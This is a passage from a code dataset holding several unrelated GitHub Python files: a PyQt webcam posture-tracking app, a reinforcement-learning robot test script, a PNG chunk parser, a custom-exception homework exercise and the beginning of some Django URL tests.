font.setWeight(75)\n self.btn_stop.setFont(font)\n self.btn_stop.setObjectName(\"btn_stop\")\n self.btn_stop.clicked.connect(self.push_off)\n\n\n self.lbl_transl = QLabel(\"Трансляция\", self)\n # self.lbl_transl.resize(640, 480)\n self.lbl_transl.move(60, 60)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.lbl_transl.setFont(font)\n self.lbl_transl.setStyleSheet(\"color: #ffffff;\")\n self.lbl_transl.setObjectName(\"lbl_transl\")\n\n self.lbl_video = QLabel(\"Видео-поток\", self)\n self.lbl_video.setFixedSize(WIDTH / 2 - 20, HEIGHT - 50)\n\n layout = QVBoxLayout()\n layout.addWidget(self.lbl_video)\n self.setLayout(layout)\n\n self.camera = global_cap\n self.timer = QtCore.QTimer(self)\n self.timer.timeout.connect(self.update_video_stream)\n self.timer.start(30)\n\n def update_video_stream(self):\n # Чтение кадра видео\n\n ret, frame = self.camera.read()\n if ret:\n # Преобразование кадра в формат QImage\n frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n image = QtGui.QImage(\n frame_rgb.data, frame_rgb.shape[1], frame_rgb.shape[0], QtGui.QImage.Format_RGB888\n )\n # Отображение кадра на виджете 
QLabel\n self.lbl_video.setPixmap(QtGui.QPixmap.fromImage(image))\n\n else:\n self.timer.stop()\n\n def push_on(self):\n global FLAG\n FLAG = True\n skeleton_recognition()\n\n\n def push_off(self):\n global FLAG_DATE\n global count\n global my_time\n global day\n global today\n global exercise_count\n my_time = int(my_time)\n my_time += int(count / 2000)\n count = 0\n\n if FLAG_DATE:\n with open(\"data.csv\", \"a\", newline=\"\") as file:\n writer = csv.writer(file)\n writer.writerow([day, today, my_time, exercise_count])\n FLAG_DATE = False\n else:\n with open(\"data.csv\", \"r\") as file:\n reader = csv.reader(file)\n lines = list(reader)\n lines[-1] = [day, today, my_time, exercise_count]\n\n with open(\"data.csv\", \"w\", newline=\"\") as file:\n writer = csv.writer(file)\n writer.writerows(lines)\n\n global FLAG\n FLAG = False\n print(FLAG)\n\n\n\n\n def open_page_exercise(self):\n self.page_exercise = PageExercise()\n self.page_exercise.show()\n self.hide()\n\n def open_page_progress(self):\n self.page_progress = PageProgress()\n self.page_progress.show()\n self.hide()\n\n def open_page_input_pw(self):\n self.page_input_pw = PageInputPassword()\n self.page_input_pw.show()\n self.hide()\n\n\nclass PageExercise(QWidget):\n def __init__(self):\n super().__init__()\n self.init_ui()\n\n def init_ui(self):\n self.setStyleSheet(\"background-color: #264653;\")\n self.setGeometry(0, 0, WIDTH, HEIGHT)\n self.setWindowTitle('Упражнения')\n\n self.btn_back = QPushButton(\"Назад\", self)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(18)\n font.setWeight(75)\n self.btn_back.setFont(font)\n self.btn_back.setStyleSheet(\"background-color: #e9c46a;\\n\"\n \"border-radius: 10px;\")\n self.btn_back.clicked.connect(self.open_main_page)\n\n # Создание кнопок \"Старт\" и \"Стоп\"\n self.btn_start = QPushButton('Cтарт', self)\n self.btn_start.setStyleSheet(\"background-color: #2a9d8f;\"\n \"color: rgb(255, 255, 255);\"\n \"border-radius: 10px;\")\n self.btn_start.resize(100, 30)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(18)\n font.setBold(True)\n font.setWeight(75)\n self.btn_start.setFont(font)\n self.btn_start.setObjectName(\"btn_start\")\n self.btn_start.clicked.connect(self.start_recording)\n\n self.btn_stop = QPushButton('Стоп', self)\n self.btn_stop.setStyleSheet(\"background-color: #e76f51;\"\n \"color: #ffffff;\"\n \"border-radius: 10px;\")\n self.btn_stop.resize(100, 30)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setBold(True)\n font.setPointSize(18)\n font.setWeight(75)\n self.btn_stop.setFont(font)\n self.btn_stop.setObjectName(\"btn_stop\")\n self.btn_stop.clicked.connect(self.stop_recording)\n\n # создание виджета для вывода видео-потока\n self.videoWidget = QLabel(self)\n self.videoWidget.resize(640, 480)\n\n # создание главного вертикального лэйаута\n self.vbox = QVBoxLayout()\n self.vbox.addWidget(self.btn_start)\n self.vbox.addWidget(self.btn_stop)\n self.vbox.addWidget(self.btn_back)\n self.vbox.addWidget(self.videoWidget)\n\n # установка лэйаута в окно\n self.setLayout(self.vbox)\n\n def start_recording(self):\n # создание объекта захвата видео с камеры\n self.cap = global_cap\n\n # создание объекта записи видео в формате AVI\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n self.out = cv2.VideoWriter((str(dt.datetime.now().date()) + str(dt.datetime.now().time()))[:12] + \".avi\",\n fourcc, 20.0, (640, 480))\n\n # запуск цикла чтения и записи кадров с камеры\n while 
(self.cap.isOpened()):\n ret, frame = self.cap.read()\n if ret == True:\n # вывод кадра на виджет\n frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n img = QtGui.QImage(\n frame_rgb.data, frame_rgb.shape[1], frame_rgb.shape[0], QtGui.QImage.Format_RGB888\n )\n self.videoWidget.setPixmap(QPixmap.fromImage(img))\n\n # запись кадра в файл\n self.out.write(frame)\n\n # обновление виджета\n QApplication.processEvents()\n else:\n break\n\n def stop_recording(self):\n # остановка записи видео в файл\n self.out.release()\n\n\n def open_main_page(self):\n self.page_main = PageMain()\n self.page_main.show()\n self.hide()\n\n\nclass PageProgress(QWidget):\n def __init__(self):\n super().__init__()\n self.init_ui()\n\n def init_ui(self):\n self.setStyleSheet(\"background-color: #264653;\")\n self.setGeometry(0, 0, WIDTH, HEIGHT)\n self.setWindowTitle('Прогресс')\n\n self.lbl_today = QLabel('СЕГОДНЯ', self)\n self.lbl_today.setGeometry(WIDTH/2 + WIDTH/4 - 70, 70, WIDTH - 180 - WIDTH / 2, 30)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(18)\n font.setBold(True)\n font.setWeight(75)\n self.lbl_today.setFont(font)\n self.lbl_today.setStyleSheet(\"color: #f4a261;\")\n self.lbl_today.setObjectName(\"lbl_today\")\n\n self.lbl_str_exer = QLabel('Количество упражнений для осанки', self)\n self.lbl_str_exer.setGeometry(WIDTH/2 + 100, 200, WIDTH - 180 - WIDTH / 2, 30)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(14)\n font.setBold(True)\n font.setWeight(75)\n self.lbl_str_exer.setFont(font)\n self.lbl_str_exer.setStyleSheet(\"color: #ffffff;\")\n self.lbl_str_exer.setObjectName(\"lbl_str_exer\")\n\n self.lbl_count_exer = QLabel(str(exercise_count), self) # счетчик упражнений\n self.lbl_count_exer.setGeometry(WIDTH/2 + WIDTH/4 - 50, 280, 100, 60)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(33)\n font.setBold(True)\n font.setWeight(75)\n self.lbl_count_exer.setFont(font)\n self.lbl_count_exer.setStyleSheet(\"color: #2a9d8f;\")\n self.lbl_count_exer.setObjectName(\"lbl_count_exer\")\n\n self.lbl_str_time = QLabel('Количество минут правильной осанки ', self)\n self.lbl_str_time.setGeometry(WIDTH/2 + 100, 380, WIDTH - 180 - WIDTH / 2, 30)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(14)\n font.setBold(True)\n font.setWeight(75)\n self.lbl_str_time.setFont(font)\n self.lbl_str_time.setStyleSheet(\"color: #ffffff;\")\n self.lbl_str_time.setObjectName(\"lbl_str_time\")\n\n self.lbl_count_time = QLabel(str(my_time), self) # счетчик времени\n self.lbl_count_time.setGeometry(WIDTH/2 + WIDTH/4 - 50, 460, 100, 60)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(33)\n font.setBold(True)\n font.setWeight(75)\n self.lbl_count_time.setFont(font)\n self.lbl_count_time.setStyleSheet(\"color: #2a9d8f;\")\n self.lbl_count_time.setObjectName(\"lbl_count_time\")\n\n self.btn_back = QPushButton(\"Назад\", self)\n self.btn_back.setGeometry(WIDTH - 120 - 40, HEIGHT - 100 - 50, 120, 50)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(12)\n font.setWeight(75)\n self.btn_back.setFont(font)\n self.btn_back.setStyleSheet(\"background-color: #e76f51;\\n\"\n \"border-radius: 10px;\")\n self.btn_back.clicked.connect(self.open_main_page)\n\n self.lbl_graf_exer = QLabel(\"График упражнений\", self)\n self.lbl_graf_exer.setFixedSize(WIDTH / 2 - 20, HEIGHT - 50)\n\n layout = QVBoxLayout()\n 
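# (editor's note) in the plotting code a few lines below, the second plt.xlabel('Exercises') call overwrites the 'Day' label set just before it; plt.ylabel('Exercises') is almost certainly what was intended\n        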
layout.addWidget(self.lbl_graf_exer)\n self.setLayout(layout)\n\n data = pd.read_csv('data.csv')\n plt.plot(data['Day'], data['Exercises'])\n plt.xlabel('Day')\n plt.xlabel('Exercises')\n\n plt.savefig('graf_exer.png')\n\n pixmap = QPixmap('graf_exer.png')\n self.lbl_graf_exer.setPixmap(pixmap)\n\n\n\n def open_main_page(self):\n self.page_main = PageMain()\n self.page_main.show()\n self.hide()\n\n\nclass PageInputPassword(QWidget):\n def __init__(self):\n super().__init__()\n self.init_ui()\n\n def init_ui(self):\n self.setStyleSheet(\"background-color: #264653;\")\n self.setGeometry(WIDTH / 2 - 200, 200, 400, 200)\n self.setWindowTitle(\"Ввод пароля\")\n\n self.lbl_password = QLabel('Введите пароль: ', self)\n self.lbl_password.setGeometry(50, 70, 1300, 30)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(8)\n font.setWeight(75)\n self.lbl_password.setFont(font)\n self.lbl_password.setStyleSheet(\"color: #ffffff;\")\n\n self.lned_input_pw = QLineEdit(self)\n self.lned_input_pw.setEchoMode(QLineEdit.Password)\n self.lned_input_pw.setGeometry(210, 70, 110, 20)\n self.lned_input_pw.setStyleSheet(\"color: #ffffff;\")\n\n self.btn_submit = QPushButton('Отправить', self)\n self.btn_submit.setGeometry(150, 130, 110, 30)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(8)\n font.setWeight(75)\n self.btn_submit.setFont(font)\n self.btn_submit.setStyleSheet(\"background-color: #e9c46a;\\n\"\n \"border-radius: 10px;\")\n self.btn_submit.clicked.connect(self.check_password)\n\n self.btn_back = QPushButton(\"Назад\", self)\n self.btn_back.setGeometry(320, 160, 70, 30)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(8)\n font.setWeight(75)\n self.btn_back.setFont(font)\n self.btn_back.setStyleSheet(\"background-color: #e76f51;\\n\"\n \"border-radius: 10px;\")\n self.btn_back.clicked.connect(self.open_main_page)\n\n def open_main_page(self):\n self.page_main = PageMain()\n self.page_main.show()\n self.hide()\n\n def check_password(self):\n password = self.lned_input_pw.text()\n\n if password == '1234':\n self.open_page_parent()\n else:\n error = QMessageBox()\n # error.se\n error.setWindowTitle(\"Ошибка доступа\")\n error.setText('Введен неверный пароль')\n error.setIcon(QMessageBox.Warning)\n error.setStandardButtons(QMessageBox.Ok)\n error.buttonClicked.connect(self.popup_action)\n error.exec_()\n # QMessageBox.warning(self, \"Ошибка доступа\", 'Введен не верный пароль')\n\n def popup_action(self, btn):\n # self.lbl_password.setText('')\n self.lned_input_pw.setText('')\n # print(\"print ok\")\n\n def open_page_parent(self):\n self.page_parent = PageParent()\n self.page_parent.show()\n self.hide()\n\n\nclass PageParent(QWidget):\n def __init__(self):\n super().__init__()\n self.init_ui()\n\n def init_ui(self):\n self.setStyleSheet(\"background-color: #264653;\")\n self.setGeometry(0, 0, WIDTH, HEIGHT)\n self.setWindowTitle('Родительский режим')\n\n self.btn_back = QPushButton(\"Назад\", self)\n self.btn_back.setGeometry(WIDTH - 120 - 40, HEIGHT - 100 - 50, 120, 50)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(12)\n font.setWeight(75)\n self.btn_back.setFont(font)\n self.btn_back.setStyleSheet(\"background-color: #f4a261;\\n\"\n \"border-radius: 10px;\")\n self.btn_back.clicked.connect(self.open_main_page)\n\n # Создание кнопки \"Посмотреть\"\n self.btn_play = QPushButton('Посмотреть', self)\n self.btn_play.setGeometry(WIDTH / 2 + 100, 
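# (editor's note) btn_reject, created further down, never gets a click handler (its connect call is commented out), so the reject button is currently inert\n                                  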
HEIGHT / 2 - 250, WIDTH - 200 - WIDTH / 2, 70)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(12)\n font.setWeight(75)\n self.btn_play.setFont(font)\n self.btn_play.setStyleSheet(\"background-color: #e9c46a;\\n\"\n \"border-radius: 10px;\")\n self.btn_play.clicked.connect(self.play_video)\n # Создание кнопки \"Принять\"\n self.btn_accept = QPushButton('Принять', self)\n self.btn_accept.setGeometry(WIDTH / 2 + 100, HEIGHT / 2 - 150, 200, 70)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(12)\n font.setWeight(75)\n self.btn_accept.setFont(font)\n self.btn_accept.setStyleSheet(\"background-color: #2a9d8f;\\n\"\n \"border-radius: 10px;\")\n self.btn_accept.clicked.connect(self.count_exercise)\n\n # Создание кнопки \"Отклонить\"\n self.btn_reject = QPushButton('Отклонить', self)\n self.btn_reject.setGeometry(WIDTH - 100 - 200, HEIGHT / 2 - 150, 200, 70)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(12)\n font.setWeight(75)\n self.btn_reject.setFont(font)\n self.btn_reject.setStyleSheet(\"background-color: #e76f51;\\n\"\n \"border-radius: 10px;\")\n # !!!!!self.btn_reject.clicked.connect(self.play_video)\n\n # Создание метки для отображения видео-потока\n self.lbl_video = QLabel(\"Видео-поток\", self)\n self.lbl_video.setFixedSize(WIDTH / 2 - 20, HEIGHT - 50)\n self.lbl_video.resize(640, 480)\n self.lbl_video.move(50, 50)\n\n # Инициализация переменных\n self.cap = None\n\n def count_exercise(self):\n global FLAG_DATE\n global my_time\n global day\n global today\n global exercise_count\n exercise_count = int(exercise_count)\n exercise_count += 1\n\n if FLAG_DATE:\n with open(\"data.csv\", \"a\", newline=\"\") as file:\n writer = csv.writer(file)\n writer.writerow([day, today, my_time, exercise_count])\n FLAG_DATE = False\n else:\n with open(\"data.csv\", \"r\") as file:\n reader = csv.reader(file)\n lines = list(reader)\n lines[-1] = [day, today, my_time, exercise_count]\n\n with open(\"data.csv\", \"w\", newline=\"\") as file:\n writer = csv.writer(file)\n writer.writerows(lines)\n\n\n\n\n def play_video(self):\n # Выбор файла видео\n filename, _ = QFileDialog.getOpenFileName(self, 'Выберите файл', '', 'Видео (*.avi)')\n if filename:\n # Открытие файла видео\n self.cap = cv2.VideoCapture(filename)\n # Чтение и отображение кадров видео-потока в метке\n while True:\n ret, frame = self.cap.read()\n if ret:\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n h, w, ch = frame.shape\n bytes_per_line = ch * w\n q_image = QImage(frame.data, w, h, bytes_per_line, QImage.Format_RGB888)\n pixmap = QPixmap.fromImage(q_image)\n self.lbl_video.setPixmap(pixmap)\n QApplication.processEvents() # Обновление интерфейса\n else:\n break\n self.cap.release()\n\n def open_main_page(self):\n self.page_main = PageMain()\n self.page_main.show()\n self.hide()\n\n\nif __name__ == \"__main__\":\n global_cap = cv2.VideoCapture(0)\n app = QApplication(sys.argv)\n main_page = PageMain()\n main_page.show()\n pygame.mixer.music.load(\"Voices/start.mp3\")\n pygame.mixer.music.play()\n pygame.time.wait(3000)\n pygame.mixer.music.stop()\n sys.exit((app.exec_(), global_cap.release(), pygame.quit()))\n","repo_name":"Sofia-Oleynik/Practice-2023","sub_path":"Project/main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":34811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"75247508206","text":"#!/usr/bin/env python3\n# -*- coding: 
utf-8 -*-\n\"\"\"\nCreated on Mon Nov 16 15:50:55 2020\n\n@author: Enrico Regolin\n\"\"\"\n\n# tester robot\nimport os, sys\n\nfrom asynch_rl.rl.rl_env import Multiprocess_RL_Environment\nfrom asynch_rl.rl.utilities import clear_pycache, load_train_params\n\nimport sys\nimport psutil\nimport time\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\nimport asyncio\n\n#####\nfrom argparse import ArgumentParser\n\nparser = ArgumentParser()\n\nparser.add_argument(\"-v\", \"--version\", dest=\"net_version\", type = int, default= 200 , help=\"training version\")\n\nparser.add_argument(\"-i\", \"--iter\" , dest=\"iteration\" , type = int, default= -1 , help=\"iteration\")\n\nparser.add_argument(\"-sim\", \"--simulate\" , dest=\"simulate\" , type=lambda x: (str(x).lower() in ['true','1', 'yes']), default= False , help=\"simulate instance\")\n\nparser.add_argument(\"-d\", \"--difficulty\" , dest=\"difficulty\" , type = int, default= 2 , help=\"difficulty\")\n\nparser.add_argument(\"-s\", \"--save-movie\" , dest=\"save_movie\" , type=lambda x: (str(x).lower() in ['true','1', 'yes']), default= True , help=\"save movie\")\n\nparser.add_argument(\"-e\", \"--eps-format\" , dest=\"eps_format\" , type=lambda x: (str(x).lower() in ['true','1', 'yes']), default= False , help=\"eps_format\")\n\nparser.add_argument(\"-dt\", \"--step-size\" , dest=\"step_size\" , type = float, default= 0.4 , help=\"simulation step size\")\n\nargs = parser.parse_args()\n################\n\n\n# generate proper discretized bins structure\n\ndef main(net_version = 100, iteration = 2, simulate = False, difficulty = 0, save_movie = False, eps_format = False, step_size = 0.4):\n\n ################\n env_type = 'RobotEnv' \n model_type = 'ConvModel'\n #rl_mode = 'AC'\n \n overwrite_params = ['rewards', 'rl_mode', 'share_conv_layers', 'n_frames' ,\\\n 'layers_width', 'map_output', 'normalize_layers', \\\n 'val_frequency']\n \n my_dict = load_train_params(env_type, model_type, overwrite_params, net_version)\n local_vars = locals()\n \n for i,par in enumerate(overwrite_params):\n #exec(par + \" = my_dict['\" + par + \"']\", None, )\n local_vars[par] = my_dict[par]\n del( overwrite_params, my_dict)\n \n \n \n ################\n \"\"\"\n my_vars = locals().copy()\n for v in my_vars:\n print(v)\n \"\"\"\n import inspect\n inspect.signature(Multiprocess_RL_Environment.__init__)\n \n \n rl_env = Multiprocess_RL_Environment(env_type, model_type, net_version, rl_mode=local_vars['rl_mode'] , ray_parallelize=False, \\\n move_to_cuda=False, n_frames = local_vars['n_frames'], show_rendering = True, discr_env_bins=2,\\\n difficulty= difficulty, map_output = local_vars['map_output'], \\\n layers_width = local_vars['layers_width'], normalize_layers = local_vars['normalize_layers'] ,\\\n rewards=local_vars['rewards'], val_frequency=local_vars['val_frequency'], step_size = step_size) #, \\\n # #replay_memory_size = 500, N_epochs = 100)\n \n \n print(f'rl mode : {rl_env.rl_mode}')\n \n rl_env.save_movie = False\n rl_env.live_plot = False\n # always update agents params after rl_env params are changed\n rl_env.updateAgentsAttributesExcept('env')\n \n rl_env.load(iteration)\n #rl_env.load(320)\n \n rl_env.print_NN_parameters_count()\n \n try:\n fig0, fig = rl_env.plot_training_log(0, qv_loss_log = False, \\\n pg_loss_log = False, save_fig = save_movie, eps_format=eps_format)\n \n except Exception:\n print('incomplete data for plot generation')\n \n \n\n\n \n #%%\n # script to clean up val hist\n \n \"\"\"\n import numpy as np\n \n mask = 
np.ones(rl_env.val_history.shape[0], dtype = bool)\n mask[16:19] = False\n \n rl_env.val_history = rl_env.val_history[mask]\n \"\"\"\n \n \"\"\"\n #save it afterwards\n import os\n #path = os.path.dirname(os.path.abspath(__file__))\n path = os.getcwd()\n val_history_file = os.path.join(path, 'val_history.npy')\n np.save(val_history_file, rl_env.val_history )\n \"\"\"\n \n \n #\"\"\"\n \n #%%\n if simulate:\n agent = rl_env.sim_agents_discr[0]\n \n #agent.live_plot = True\n agent.max_steps_single_run = int(1000*0.4/step_size)\n \n #\n agent.movie_frequency = 1\n #agent.tot_iterations = 10000\n agent.tot_iterations = int(500*0.4/step_size)\n agent.max_n_single_runs = 5\n\n if save_movie:\n rl_env.update_net_name()\n agent.net_name = rl_env.net_name\n agent.save_movie = True\n agent.tot_iterations = int(2500*0.4/step_size)\n agent.max_n_single_runs = 10\n \n sim_log, single_runs , successful_runs,_,_, pg_info = agent.run_synch(use_NN = True, test_qv = False)\n \n if 'fig0' in locals():\n fig.waitforbuttonpress(20)\n fig0.waitforbuttonpress(20)\n #fig_st.waitforbuttonpress(20)\n\n \"\"\"\n stats = []\n n_samples = 40\n for i in range(1,n_samples):\n pctg_success = (round(100*rl_env.traj_stats[-i].count('success')/len(rl_env.traj_stats[-i])))\n stats.append(pctg_success)\n print(f'success percentage last {n_samples}: {sum(stats)/len(stats)}%')\n \"\"\"\n\n\n#%%\n################################################################\n\nif __name__ == \"__main__\":\n \n main(net_version = args.net_version, iteration = args.iteration, simulate = args.simulate, \\\n difficulty = args.difficulty, save_movie=args.save_movie, eps_format=args.eps_format, step_size = args.step_size)\n\n current_folder = os.path.abspath(os.path.dirname(__file__))\n clear_pycache(current_folder)\n\n","repo_name":"EnricoReg/asynch-rl","sub_path":"examples/Tester_robot.py","file_name":"Tester_robot.py","file_ext":"py","file_size_in_byte":5935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"32839985665","text":"from util.byte_util import getChar, getBigByte, getBigShort, getBigInt\n\ndef ihdr(file, start, size):\n i = start\n \n ptd, i = getBigInt(file, i)\n print('寬度:', ptd)\n\n ptd, i = getBigInt(file, i)\n print('長度:', ptd)\n\n ptd, i = getBigByte(file, i)\n print('位元深度:', ptd)\n\n color_type = {0: '灰階', 2: '真彩', 3: '索引色', 4: '帶alpha灰階', \n 6: '帶alpha真彩'}\n ptd, i = getBigByte(file, i)\n clr_type = ptd\n print('顏色種類:', color_type[clr_type], '({})'.format(clr_type))\n \n i = i + 2 # Skip 2 1-byte parameters\n\n il_type = {0: '無', 1: 'Adam7'}\n ptd, i = getBigByte(file, i)\n print('格行掃描方法:', il_type[ptd], '({})'.format(ptd))\n i = i + 4 # Skip 4-byte CRC\n return i, clr_type\n\ndef chrm(file, start):\n i = start\n\n ptd, i = getBigInt(file, i)\n print('白點 X:', ptd)\n\n ptd, i = getBigInt(file, i)\n print('白點 Y:', ptd)\n\n ptd, i = getBigInt(file, i)\n print('紅 X:', ptd)\n\n ptd, i = getBigInt(file, i)\n print('紅 Y:', ptd)\n\n ptd, i = getBigInt(file, i)\n print('綠 X:', ptd)\n\n ptd, i = getBigInt(file, i)\n print('綠 Y:', ptd)\n\n ptd, i = getBigInt(file, i)\n print('藍 X:', ptd)\n\n ptd, i = getBigInt(file, i)\n print('藍 Y:', ptd)\n \n i = i + 4 # Skip 4-byte CRC\n \n return i\n\ndef gama(file, start, size):\n i = start\n \n ptd, i = getBigInt(file, i)\n print('Gamma:', ptd)\n \n i = i + 4 # Skip 4-byte CRC\n \n return i\n\ndef iccp(file, start, size):\n i = start\n ptd = '0'\n profile = []\n \n while not ptd == '\\0':\n ptd, i = getChar(file, i)\n profile.append(ptd)\n 
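# (editor's note) the text()/ztxt()/itxt() parsers below test ptd in their while-conditions before ever assigning it, which raises NameError at runtime; seeding it first, as this function does, fixes that, e.g. (illustrative sketch):\n    #     ptd = '0'\n    #     while not ptd == '\\0':\n    #         ptd, i = getChar(file, i)\n    #         keyword.append(ptd)\n    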
print('Profile:', ''.join(profile))\n\n return start + size + 4\n\ndef sbit(file, start, size, clr_type):\n i = start\n \n if clr_type == 0:\n ptd, i = getBigByte(file, i)\n print('最高灰階有效位:', ptd)\n elif clr_type == 2 or clr_type == 3:\n ptd, i = getBigByte(file, i)\n print('最高紅色有效位:', ptd)\n \n ptd, i = getBigByte(file, i)\n print('最高綠色有效位:', ptd)\n \n ptd, i = getBigByte(file, i)\n print('最高藍色有效位:', ptd)\n elif clr_type == 4:\n ptd, i = getBigByte(file, i)\n print('最高灰階有效位:', ptd)\n \n ptd, i = getBigByte(file, i)\n print('最高alpha有效位:', ptd)\n elif clr_type == 6:\n ptd, i = getBigByte(file, i)\n print('最高紅色有效位:', ptd)\n \n ptd, i = getBigByte(file, i)\n print('最高綠色有效位:', ptd)\n \n ptd, i = getBigByte(file, i)\n print('最高藍色有效位:', ptd)\n \n ptd, i = getBigByte(file, i)\n print('最高alpha有效位:', ptd)\n \n return start + size + 4\n\ndef text(file, start, size):\n i = start\n keyword = []\n text = []\n \n while not ptd == '\\0':\n ptd, i = getChar(file, i)\n keyword.append(ptd)\n keyword = ''.join(keyword)\n \n while not i == start + size + 4:\n ptd, i = getChar(file, i)\n text.append(ptd)\n text = ''.join(text)\n print(keyword + ':', text)\n \n return start + size + 4\n\ndef ztxt(file, start, size):\n i = start\n keyword = []\n text = []\n \n while not ptd == '\\0':\n ptd, i = getChar(file, i)\n keyword.append(ptd)\n keyword = ''.join(keyword)\n print('關鍵字:', keyword)\n \n return start + size + 4\n\ndef itxt(file, start, size):\n i = start\n keyword = []\n lang = []\n \n while not ptd == '\\0':\n ptd, i = getChar(file, i)\n keyword.append(ptd)\n keyword = ''.join(keyword)\n print('關鍵字:', keyword)\n \n i = i + 2 # Skip 2-byte parameter\n \n while not ptd == '\\0':\n ptd, i = getChar(file, i)\n lang.append(ptd)\n lang = ''.join(lang)\n print('語言:', lang)\n \n return start + size + 4\n\ndef phys(file, start, size):\n i = start\n \n ptd, i = getBigInt(file, i)\n print('X軸每單位像素數:', ptd)\n \n ptd, i = getBigInt(file, i)\n print('Y軸每單位像素數:', ptd)\n \n unit_type = {0: '未知(長寬比)', 1: '公制'}\n ptd, i = getBigByte(file, i)\n print('單位:', unit_type[ptd], '({})'.format(ptd))\n \n i = i + 4 # Skip 4-byte CRC\n \n return i\n\ndef time(file, start, size):\n i = start\n \n year, i = getBigShort(file, i)\n month, i = getBigByte(file, i)\n day, i = getBigByte(file, i)\n hour, i = getBigByte(file, i)\n minute, i = getBigByte(file, i)\n second, i = getBigByte(file, i)\n print('時間:',\n '{}-{}-{} {}:{}:{}'.format(year, month, day, hour, minute, second))\n \n i = i + 4 # Skip 4-byte CRC\n \n return i\n\ndef otherChunk(file, start, size):\n return start + size + 4","repo_name":"andymememe/FileFormatInfo","sub_path":"util/png_util.py","file_name":"png_util.py","file_ext":"py","file_size_in_byte":4816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"17519109577","text":"# Task 4\n# Custom exception\n# Create your custom exception named `CustomException`,\n# you can inherit from base Exception class,\n# but extend its functionality to log every error message\n# to a file named `logs.txt`.\n# Tips: Use __init__ method to extend functionality for saving messages to file\n\nclass CustomException(Exception):\n def __init__(self, msg):\n if msg:\n self.message = msg\n with open(r\"my_file.txt\", 'w') as hello_file:\n hello_file.write(self.message)\n else:\n self.message = None\n\n def __str__(self):\n print(self.message)\n if self.message:\n return 'MyError, {0} '.format(self.message)\n else:\n return 'MyError has been raised'\n\n\nraise CustomException('We have a 
problem!')\n\n\n\n","repo_name":"InnaOrtman/homework","sub_path":"урок 11/task_4.py","file_name":"task_4.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14457849230","text":"from django.test import TestCase, Client\nfrom django.contrib.auth import get_user_model\nfrom ..models import Post, Group, Comment, Follow\nfrom http import HTTPStatus\nfrom django.core.cache import cache\n\nUser = get_user_model()\n\n\nclass PostURLTests(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.author = User.objects.create_user(username=\"author\")\n cls.user = User.objects.create_user(username=\"user\")\n cls.group = Group.objects.create(\n title=\"Тестовая группа\",\n slug=\"test-slug\",\n description=\"Тестовое описание\",\n )\n cls.post = Post.objects.create(\n author=cls.author,\n text=\"Тестовый пост\",\n group=cls.group,\n )\n cls.comment = Comment.objects.create(\n post=cls.post,\n author=cls.user,\n text=\"Тестовый комментарий\",\n )\n cls.follow = Follow.objects.create(\n user=cls.user,\n author=cls.author,\n )\n\n def setUp(self):\n self.guest_client = Client()\n self.authorized_client = Client()\n self.author_client = Client()\n self.authorized_client.force_login(self.user)\n self.author_client.force_login(PostURLTests.post.author)\n cache.clear()\n\n def test_guest_client_urls_status_code(self):\n \"\"\"Проверка status_code для неавторизованного пользователя\"\"\"\n url_code = {\n \"/\": HTTPStatus.OK,\n f\"/group/{PostURLTests.post.group.slug}/\": HTTPStatus.OK,\n f\"/profile/{PostURLTests.user}/\": HTTPStatus.OK,\n f\"/posts/{PostURLTests.post.id}/\": HTTPStatus.OK,\n f\"/posts/{PostURLTests.post.id}/edit/\": HTTPStatus.FOUND,\n f\"/posts/{PostURLTests.post.id}/comment/\": HTTPStatus.FOUND,\n f\"/profile/{PostURLTests.user}/follow/\": HTTPStatus.FOUND,\n f\"/profile/{PostURLTests.user}/unfollow/\": HTTPStatus.FOUND,\n \"/follow/\": HTTPStatus.FOUND,\n \"/create/\": HTTPStatus.FOUND,\n \"/unexisting_page/\": HTTPStatus.NOT_FOUND,\n }\n for url, code in url_code.items():\n with self.subTest(url=url):\n response = self.guest_client.get(url)\n self.assertEqual(response.status_code, code)\n\n def test_authorized_client_urls_status_code(self):\n \"\"\"Проверка status_code для авторизованного пользователя\"\"\"\n url_code = {\n \"/\": HTTPStatus.OK,\n f\"/group/{PostURLTests.post.group.slug}/\": HTTPStatus.OK,\n f\"/profile/{PostURLTests.user}/\": HTTPStatus.OK,\n 